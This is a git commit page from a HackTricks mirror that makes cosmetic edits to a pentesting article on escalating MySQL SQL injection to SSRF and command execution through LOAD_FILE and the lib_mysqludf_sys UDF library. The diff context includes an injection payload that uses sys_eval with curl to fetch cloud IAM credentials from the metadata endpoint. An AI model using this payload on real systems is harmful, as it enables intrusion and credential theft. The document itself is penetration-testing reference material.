0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GitBook: [#3584] No subject

This commit is contained in:
CPol 2022-10-08 18:06:39 +00:00 committed by gitbook-bot
parent 5d7c86366f
commit d8ffc8fffb
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
2 changed files with 7 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
SUMMARY.md
View File

@ -521,7 +521,7 @@
* [MS Access SQL Injection](pentesting-web/sql-injection/ms-access-sql-injection.md)
* [MSSQL Injection](pentesting-web/sql-injection/mssql-injection.md)
* [MySQL injection](pentesting-web/sql-injection/mysql-injection/README.md)
* [Mysql File priv to SSRF/RCE](pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md)
* [MySQL File priv to SSRF/RCE](pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md)
* [Oracle injection](pentesting-web/sql-injection/oracle-injection.md)
* [PostgreSQL injection](pentesting-web/sql-injection/postgresql-injection/README.md)
* [dblink/lo\_import data exfiltration](pentesting-web/sql-injection/postgresql-injection/dblink-lo\_import-data-exfiltration.md)

12
pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
View File

@ -1,4 +1,4 @@
# Mysql File priv to SSRF/RCE
# MySQL File priv to SSRF/RCE
<details>
@ -14,7 +14,7 @@
**Post copied from** [**https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#mysqlmariadbpercona**](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#mysqlmariadbpercona)
### Using LOAD\_FILE/LOAD DATA/LOAD XML
### LOAD\_FILE/LOAD DATA/LOAD XML to SSRF
Every SQL Out of Band data exfiltration article will use the `LOAD_FILE()` string function to make a network request. The function itself has its own limitations based on the operating system it is run on and the settings with which the database was started.
@ -30,13 +30,13 @@ This Server Side Request Forgery, although useful, is restricted to only TCP por
![](https://ibreak.software/img/using-sql-injection-to-perform-ssrf-xspa-attacks/3.png)
### Using User Defined Functions
### User Defined Functions to RCE
Another cool technique with MySQL databases is the ability to use User Defined Functions (UDF) present in external library files that if present in specific locations or system $PATH then can be accessed from within MySQL.
You could use a SQL Injection to write a library (`.so` or `.dll` depending on Linux or Windows), containing a User Defined Function that can make network/HTTP requests, that can be then invoked through additional queries.
You could use a SQL Injection to **write a library (`.so` or `.dll`** depending on Linux or Windows), containing a User Defined Function that can make network/HTTP requests, that can be then invoked through additional queries.
This has its own set of restrictions though. Based on the version of MySQL, which you can identify with `select @@version`, the directory where plugins can be loaded from is restricted. MySQL below `v5.0.67` allowed for library files to be loaded from system path if the `plugin_dir` variable was not set. This has changed now and newer versions have the `plugin_dir` variable set to something like `/usr/lib/mysql/plugin/`, which is usually owned by root.
This has its own set of restrictions though. Based on the version of MySQL, which you can identify with `select @@version`, the directory where plugins can be loaded from is restricted. MySQL below `v5.0.67` allowed for library files to be loaded from system path if the `plugin_dir` variable was not set. This has changed now and newer versions have the **`plugin_dir`** variable set to something like `/usr/lib/mysql/plugin/`, which is usually owned by root.
Basically **for you to load a custom library into MySQL and call a function from the loaded library via SQL Injection, you would need**:
@ -44,7 +44,7 @@ Basically **for you to load a custom library into MySQL and call a function from
* **`file_priv`** set to **`Y`** in `mysql.user` for the current database user
* **`secure_file_priv`** set to **`""`** so that you can read the raw bytes of the library from an arbitrary location like the network or a file uploads directory in a web application.
Assuming the above conditions are met, you can use the classical approach of transferring the [popular MySQL UDF `lib_mysqludf_sys` library](https://github.com/mysqludf/lib\_mysqludf\_sys) to the database server. You would then be able to make operating system command requests like `cURL` or `powershell wget` to perform SSRF using the syntax
Assuming the above conditions are met, you can use the **classical approach of transferring the** [**popular MySQL UDF `lib_mysqludf_sys` library**](https://github.com/mysqludf/lib\_mysqludf\_sys) **to the database server**. You would then be able to make operating system command requests like `cURL` or `powershell wget` to perform SSRF using the syntax
`x'; SELECT sys_eval('curl http://169.254.169.254/latest/meta-data/iam/security-credentials/'); -- //`